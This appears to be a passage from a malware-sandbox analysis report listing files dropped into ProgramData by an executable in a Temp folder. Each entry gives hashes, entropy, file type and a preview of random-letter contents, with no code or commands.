                                                                                                                                                                                                                                Preview:NEBFQQYWPSTEXBZIDUTTATZZTFWRABRJBLLCZYJOVRXHUMPDHEGQDWTHPNRIJXJXBUSQEVJKULMLPCAPCSHFUPDJCEAANNYOFDUHLLLHOVFNKNTRVWZEFIUBXRXIMRWXDPWVTFKQMGYNRABMTANRGGSLGEIOAUBQFQTLCZWMEHWOZIIQMRJLAHLXPXNJVCGLENXDTBFKZKJLYBJRCHNDCSDKFOXIBOZTNXJYAJRSBBQPGAKTHVHMQLXYQGBGJEKXNNJBZRONCQRXSXGBODHFEHXLSDNKZKOYGQWTAWCYFZWCAASDECKZAPFZVLHUZNKAOEOFXYACNHCKLJCQBGVLWGGJAXFSREDNBXZVKQXDJSDSXQALVYBQAWFRFADSUOUAJLGHBNXRJZTADMFYSWTEEFNLTNZQFEUIHOMLHDFXIINXAWFLMBVWLQALRTVDAZZJLUPLSSAEVUHCENQHZDZHUFSLZAWTBWUIZXADMDJFNIGCMGZAUDXHJYRRCZLEWREZLOERQDDSEKREDPHBBKIUIEJMDLPLKXBZACMCVBOXPIUSWSAYGLJYPERFESVJDFDUCRRMCERYFAOHUKEWBRHIXVALIOBSUZIVKQJYQBYWWQBTQFSMFCMHHJGZWZAIAVHBXGYJSOQFKNTZPVJPXHVDUHZBGDUQFSTVAISEPGJPRFXXECIDSLUEKKGYCYYRYPCKPELJNUUBXKUPANFFQZXZCHJZGUXECSVNTCLQWVYUIUXXUHBVRWGMIPLLBTOOJWGEFGIBSTEOEUCIBZTYLFTDGDCLFGIIEJZNJQROHSUVDJWKISAIRTACFAGNSREZROONUNTUTBQDAEWKYIKLSDTXHQQYMOCADIFSSOJPAJKIYLOJZORJLSPXKKVUAEDRRGACWHBZIGNBZSFLRWHTOKEKQVLZFXTYGAOTMFRKSVLKIISUBYUBNXKHYRNKANSRGPAEMLRECJWZZUGCQATTLPPBVLBJPOLHBERJWQJMJGFN

                                                                                                                                                                                                                                C:\ProgramData\NHPKIZUUSG.xlsx

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\u5v8.0.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.70435191336402
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:q83Oua2II99Dm5Xcf7kmp5fFjUTZF/+akoYY9fBpCtJ6Wi5v:7OD2ISi5Xcz9l8RkcFCJ6Wix
                                                                                                                                                                                                                                MD5:8C1F71001ABC7FCE68B3F15299553CE7
                                                                                                                                                                                                                                SHA1:382285FB69081EB79C936BC4E1BFFC9D4697D881
                                                                                                                                                                                                                                SHA-256:DCC1D5A624022EFCE4D4A919041C499622A1213FD62B848C36E6252EE29B5CAE
                                                                                                                                                                                                                                SHA-512:8F2124445F7856BFFBB3E7067135CFA70BFB657F8CEAEE89312CF15CFA127CACF28C2F1F9CD1CC64E56A8D8C248E237F2E97F968D244C457AD95D0AD5144E2A7
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:NHPKIZUUSGERQSLBGSEAVXGNDWXNHRIMGKQZIYGMNAKLDSDLMZTSHWNQSMRLTOXKIQVZWPTPMYGCCCTOQMOFGPYVVCCUDORIXMMXDHKCETULBHLJENABEIJPTFOHFPIUUSFPUHSBHENDANFMOYZRZAXYVFEZIKDKUEVZAWEFKRTUJZPFUDMEZZQVBGYMMIHKEBYJMJMTTXSDTDQAUATXLABLBEJUBBPSXZPXMHVNHOHYPKCYLDVGJSBPEXWGYVPHWPWLYJIOFFNQHAOBSRORLXUKIHEETKPFDPHQAGTKOMEWPBYGMTXHOQFINPIQARIVGCFUFIETTFUMCUDHRHCSTIZWRDJEHWOLAFOSWAVIGSWONBSKFWHCQAGHLWBKAFUQUULJRVZNUGGVOCCVTTWZEZFPJKZDJMHDYXQKDPLRECPAAEZVBXFDGZJIUGNMOEAISGBSPVTDRADHODLAXUFWZVTJPIGKERLENNAJHHHNNAPBWXCOGJSNVQJJEEPSMESQKGYOHXVMZQNSMSJHQHSGCJZCBZJXMLGNQQKZRIQSQCAWXZFCRMGMMLKHZDWNQTXPTYWGWNQQEQWEZJPQVPOASQIIJYWPUVLHFSLMGHWITYEKRNYGXYTAJZSRGYUWTMRNOICIEPMAYUOIDDOUSYSPAILYQQLYDTBOTEDGSCNXDRRQMOBWCQMDCQXTPEXDKPLVRMFZSKERSAULAYLSOJGDMFTZECKZYYLQVVDOMXISCOBUPPSAYUFOWOCBDJALHRAXDIKEMRYGQMEYTENAHXKWSVJEDEJTIUWZDHLIBKQRVMQLSAYIIOZDWWOLHCJUVJVRYJLTIENWCTYDOSJVSFUHOQPOXCMFGTAWFRCZJNYBCRPUFRUMZIBQDOVOBMFCHMMFHSSJZDCZNMWNCNSQMZWHCOEYNCAFONSABBQCKAPFWJIGKNUCUJZWUKRWIOFVWQWFSYAHDWXEMJKFZYMRVIRAMPVKBXONBJFTXIBDAYIE

                                                                                                                                                                                                                                C:\ProgramData\PSAMNLJHZW.docx

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\u5v8.0.exe
                                                                                                                                                                                                                                File Type:PSA archive data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.698960923923406
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:mGnbK2uIv9xuPtDhsIChdpYx5eCmVRCqmDCL4yq/6jv:fpuVKIChHYve9RC2LpEK
                                                                                                                                                                                                                                MD5:186B4E00711974F7AF578BD6FF959BBF
                                                                                                                                                                                                                                SHA1:642B794D73FB09655FBFF8EDCAAA267634554569
                                                                                                                                                                                                                                SHA-256:2505B69640298D08BF2DC435A6D289C1FE7ABB349D2017F63EAD8CD2C94199EF
                                                                                                                                                                                                                                SHA-512:DD6260B7AF96C7449D3DB4826888F7EAD8F274F9E170E103D588B0AB00A044B5978544A10F7B3C0C8464B74FD10B087C5671177AC1468D7F172DF4E7644A336E
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:PSAMNLJHZWSQDMAZGNPSQVJPYSFUCTTGDJYZLMXSOOEBVYTMYXCFKBUKVYFFHMXRUCYMSTINQFSWBKGZHWWOXSUHIJJAHELKVUMDNJZMRMZFKOUIQGCNVNZVXKWKRUMIVVNVMXPLQTYNNEISPTFLHCHCESXNGLPJCEUOVDOFSSNZDEVGGWGRIJYDNPIXZZQRIXXGAVNXXGMBNWDRPEIKJPBTWXUETHQXVKVNRJASMGUWQWQPUCAORVUSLGQPHEZAOFOACKQOBETERETOORPNJFKDGTDRHKRKEEAGCTYGGVCLOVTVNKIGBHRQXIREFRVVEMBZIDHIFEIOHPIJYGZWGTQWILPNZTDESONAGSHAQLUAVRKHMFOMOQYJXRVMLCUUJVOTUCVOEBKITXOZUZGZKCYNALMRPHSNXGINUBTOYHFDFQLRSZOZWPZGUFGNQWCZHZIXHOYMIXONKNPROHQRYFNTXULDHBFGYLGFAUXJWMFXTRDTCJKCQRMPSJWGMOUCEGLQWZCNKFEKFEUJJIUNMHRRSZPYMRYVQQYYPMGHHEKAQFKKXELSAQQLSLKKUPFWZCMCMFAINYSBZBCFXHKVLASFVZCXQXXXZLHZDHVGKAFBMUFYPUMCUFVZMLVFPOUFRVLCXBIJNSPUAJZYMLVZAAGXYNUCZCXJWFYMHPNYUZQZEKWRMDNWTUBEAPAAIVGGSWPFGRSUHMUGOYCHHBOMRHKMENUQTICOXQBOTOWXHARDPYNZYJCISYKDDFBREXFJNPUTCEDQXTRWWXEGLPLZBRUZXKHOJYFWTASZSDLWXBSEYMHYXZCADAYDPKFTVEVMYYPXPKGKKZUPTORUPLLMBXPDGYHRPPKYZOAWNEPPXHMTQWXMSQFVUTRDJEQKYSLZXRWAHJVOXMIJIPEMOVSQXZXCXSWRQRFYBFUTICJAAGKRSNWDBSGSEWJUBOEPILXBOYUDRCBRFHNBWDQPKBAZMBFBVNFLUTVKABREBJZU

                                                                                                                                                                                                                                C:\ProgramData\TQDGENUHWP.docx

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\u5v8.0.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.696312162983912
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:G1O/dOdJXH3hrdB2Swsk4go3oInr8X513aQRmy8:Gk/8ASwsk4+p13aQRmy8
                                                                                                                                                                                                                                MD5:83B91EFB8185C5AF5A6B60F4FE9CC2D2
                                                                                                                                                                                                                                SHA1:0EB7AE1817790DFC5225A02B74A272C84FEE4240
                                                                                                                                                                                                                                SHA-256:8CA340B024C5A3134DE6C89C30C866FF4BCE5175C9E1A2F52075C0199BA1AE1E
                                                                                                                                                                                                                                SHA-512:F8445B5F18C9F48EFB98B6A310CD757314DA5173FD3490357672B51FED3FF72FF5095E0D17C829D96DE873FC70358D25B7D6369D3458E3AD9BF8D81A5158E46A
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:TQDGENUHWPOCQZOYQQOVXFSKSTVMXJXDOGOCIXCWWCXZFXOXQRGWSWDAFLWSMHLOUKOWNWJZPGDUHFUOAFKMGKZSPLKHWSRWYDTUFQOCIDPUEJWNIBXMGMKONCTOFFHYQKJVCNHZNUJEOZENPYTNSRLJTSURGKKJCGXUYFVMRAZPMGMDFRPRULQNWCKIPLLNINZSUGVTDCGZRWHZSXIUPCOMERQUITTFVYNMJAILLEFBCIQKNYWQSMDKSPSFLHLQBLKQAEZLJWWEWETIASOLCSWFIXBUJNPPEHQBZSFNEUZFVYKPQARONAVPSWNEPHPCPVTKNOEKMSHCSJAPMMZNDUPXNUGZKLFLOSEJTWSTMGTHPBJYPYNXJEWKYXAKPNBGAIGQOTOBFIGYXOMEBYKJUBUPHBKYEZJVKWOADWXTWXLHTSSJJEERVQTAWAOSLBHXXTKQCBLUENVULQPPPVUVFHCENGXCXUSAZURTDXJOJRVDUZPYWRIUSKDWALNPHAPYXYAERIQLWZTHISZCPAZAYJUBWJKBPUIGQPXVFOKOOGOSRASRQRXJZKSCRTHITTCLDLPTEZZSZSDTBFLVSLNNNCFBQWXQTNNRLQJVYZMPDHMVNLLNOLJVTFFUHUBHWDTBQKSTZEJFYHQBZJSAPJXIHOPGXRYNJUZKHMXOGNCKLDPKDLFZKFWOTJGQBXZEFMAORUVHQXYVLBLBKUEYUWVIBYNGTPNSHZOAVYSECDNRJFEGATTFBNLTQQUDTNINSTLBVFBUSUTOHOOYLKJQMLOIFMKXGXCKWFSCHWJWRKMACAXTEHDSMYMGSWIIEYXHNGOVDUHWQGNNBGIFZMCRKAOJVZMMWSNYYKMFTRQPINRLBTNCHSQPNQPZMLLJEOZIIMQPOJUGCVEYNAAXXWRXITWSOITACOECPNTBINMRHSPKJBVHYDZYLQUMSXHKEBERJIZQEQTSXEYVHBIPMZLMZSQIREGSQGAJPZFYHOBSSQYU

                                                                                                                                                                                                                                C:\ProgramData\TQDGENUHWP.xlsx

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\u5v8.0.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.696312162983912
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:G1O/dOdJXH3hrdB2Swsk4go3oInr8X513aQRmy8:Gk/8ASwsk4+p13aQRmy8
                                                                                                                                                                                                                                MD5:83B91EFB8185C5AF5A6B60F4FE9CC2D2
                                                                                                                                                                                                                                SHA1:0EB7AE1817790DFC5225A02B74A272C84FEE4240
                                                                                                                                                                                                                                SHA-256:8CA340B024C5A3134DE6C89C30C866FF4BCE5175C9E1A2F52075C0199BA1AE1E
                                                                                                                                                                                                                                SHA-512:F8445B5F18C9F48EFB98B6A310CD757314DA5173FD3490357672B51FED3FF72FF5095E0D17C829D96DE873FC70358D25B7D6369D3458E3AD9BF8D81A5158E46A
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:TQDGENUHWPOCQZOYQQOVXFSKSTVMXJXDOGOCIXCWWCXZFXOXQRGWSWDAFLWSMHLOUKOWNWJZPGDUHFUOAFKMGKZSPLKHWSRWYDTUFQOCIDPUEJWNIBXMGMKONCTOFFHYQKJVCNHZNUJEOZENPYTNSRLJTSURGKKJCGXUYFVMRAZPMGMDFRPRULQNWCKIPLLNINZSUGVTDCGZRWHZSXIUPCOMERQUITTFVYNMJAILLEFBCIQKNYWQSMDKSPSFLHLQBLKQAEZLJWWEWETIASOLCSWFIXBUJNPPEHQBZSFNEUZFVYKPQARONAVPSWNEPHPCPVTKNOEKMSHCSJAPMMZNDUPXNUGZKLFLOSEJTWSTMGTHPBJYPYNXJEWKYXAKPNBGAIGQOTOBFIGYXOMEBYKJUBUPHBKYEZJVKWOADWXTWXLHTSSJJEERVQTAWAOSLBHXXTKQCBLUENVULQPPPVUVFHCENGXCXUSAZURTDXJOJRVDUZPYWRIUSKDWALNPHAPYXYAERIQLWZTHISZCPAZAYJUBWJKBPUIGQPXVFOKOOGOSRASRQRXJZKSCRTHITTCLDLPTEZZSZSDTBFLVSLNNNCFBQWXQTNNRLQJVYZMPDHMVNLLNOLJVTFFUHUBHWDTBQKSTZEJFYHQBZJSAPJXIHOPGXRYNJUZKHMXOGNCKLDPKDLFZKFWOTJGQBXZEFMAORUVHQXYVLBLBKUEYUWVIBYNGTPNSHZOAVYSECDNRJFEGATTFBNLTQQUDTNINSTLBVFBUSUTOHOOYLKJQMLOIFMKXGXCKWFSCHWJWRKMACAXTEHDSMYMGSWIIEYXHNGOVDUHWQGNNBGIFZMCRKAOJVZMMWSNYYKMFTRQPINRLBTNCHSQPNQPZMLLJEOZIIMQPOJUGCVEYNAAXXWRXITWSOITACOECPNTBINMRHSPKJBVHYDZYLQUMSXHKEBERJIZQEQTSXEYVHBIPMZLMZSQIREGSQGAJPZFYHOBSSQYU

                                                                                                                                                                                                                                C:\ProgramData\WKXEWIOTXI.docx

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\u5v8.0.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.697336881644685
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:DVE9Jf1tiezZxapTBz4fmlhQHdwc6WS/ZCGxruwyJM:Deu8xafWWKHj6Zx
                                                                                                                                                                                                                                MD5:08AF516B9E451DB9845289801A21F1BC
                                                                                                                                                                                                                                SHA1:D43E58D334ACFAE831AD929003D89DC6D3B499F9
                                                                                                                                                                                                                                SHA-256:C459EA8FCABD26C75606F78F91AA8446698D90422EE4869ABE4ABCCB50B45379
                                                                                                                                                                                                                                SHA-512:C8C2BB634740DBDDC5928E5FD3960011BB86842B72673FDCE2D65C86AE6D5945F0C88E81AE96DEA711CC654FAC8B4EC809DF18F57BFB4129503DE37E426CF055
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:WKXEWIOTXIKPVKMTOJVZKCCJOJQJVVBUCRVSCWBTZFRFCLMJEFYWDAADXDSWAVKQUKEQVBGBEVVYQQKRCSDIQBFHQPNUHXEGBVBQAZXUXMBFNLNCNTBFAMVYZJITBIGADWSFAFETGWVSLSMWHTRSSUNGFAPUBMTUYBFNDIWUKESLBWQSCOTLFFHGDQBTCYHJBCBOARQTWMUDRIUXIXOCLDIEADCRMXGAMQGVIRNLAGTALJHBZWRNXXRRBLYDOAYCBGEJCTGYVJXPIAIVUAKQQBRSXZKMFBMWWCHMTGNMNRBVSOTUFWOEJRLHHVPMJECGASFUTKIEPJVDDGJBEAOSKQSOAKQFVDMPVFZXVQQGBIVNAKYSEGLMWLAYDYTALUJSLPWCLEJKQBXBYHAKPFMJEIYHGDOFGQSDOCEQICJNJHPIMYZXEEBLQDGZQJHXKMNXDWJCMMFBONBYYWLDOKPYOROQOAOXKLNFZNGOBDFJUKRZTHKLRBINVCYAUIXORJECNOHLVMBHPPCTEWZMHAKKOWVWNWGYCHRMUWRNDXFYYWTIGTCJKQDPGUNHAJQDLUZMXHCGTFUQBMGYHZZQTDVDXANXWNWKFTJJGQDHQOXVXPQVSIEKEEJXYUACENKWKIJBJQXHMLMPZXYAVPNORKZSDXAKFPVLVKXAALPKPLPVFPCSRBEEJDNJCIJXXOCNXCBVGHIYCQQVQHTTNURHGTJJXKJRPJEGOUFOHMMCJGVNMXOAXZBVGWVBLQZNFUTGTNMFHQOEJPQLIMHIWPQHWMJJDCVVMWJEEFQQZJEEECMHCCUANTBJYRWUCSJSOHYMSBWTKOKBZPVNMIVCLDDALCEUFSLAOCOCSAXADDYPCSIANHKQFGMSMYTDVKAOIYTWPDDCRKDNZYGXHYDSDFXTLUDKREZTPVBCYOHCUNIFNCKBSSGTENGDYROMJUTSSFWEEFXLJPBMSINKXZCEUWQMDWGNHDWNFHYTECVIYIAPNGWL

                                                                                                                                                                                                                                C:\ProgramData\WUTJSCBCFX.docx

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\u5v8.0.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.688284131239007
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
                                                                                                                                                                                                                                MD5:E8ACCA0F46CBA97FE289855535184C72
                                                                                                                                                                                                                                SHA1:059878D0B535AEE9092BF82886FC68DC816D9F08
                                                                                                                                                                                                                                SHA-256:CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
                                                                                                                                                                                                                                SHA-512:185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI

                                                                                                                                                                                                                                C:\ProgramData\WUTJSCBCFX.xlsx

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\u5v8.0.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.688284131239007
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
                                                                                                                                                                                                                                MD5:E8ACCA0F46CBA97FE289855535184C72
                                                                                                                                                                                                                                SHA1:059878D0B535AEE9092BF82886FC68DC816D9F08
                                                                                                                                                                                                                                SHA-256:CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
                                                                                                                                                                                                                                SHA-512:185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI

                                                                                                                                                                                                                                C:\ProgramData\XZXHAVGRAG.docx

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\u5v8.0.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.69156792375111
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
                                                                                                                                                                                                                                MD5:A4E170A8033E4DAE501B5FD3D8AC2B74
                                                                                                                                                                                                                                SHA1:589F92029C10058A7B281AA9F2BBFA8C822B5767
                                                                                                                                                                                                                                SHA-256:E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
                                                                                                                                                                                                                                SHA-512:FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

                                                                                                                                                                                                                                C:\ProgramData\ZGGKNSUKOP.xlsx

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\u5v8.0.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.6959554225029665
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
                                                                                                                                                                                                                                MD5:DCABA2748DFEAEF0BFBC56FD9F79315C
                                                                                                                                                                                                                                SHA1:B87FBA690A774893B22B9F611DFDCB5CDC520269
                                                                                                                                                                                                                                SHA-256:86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
                                                                                                                                                                                                                                SHA-512:65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
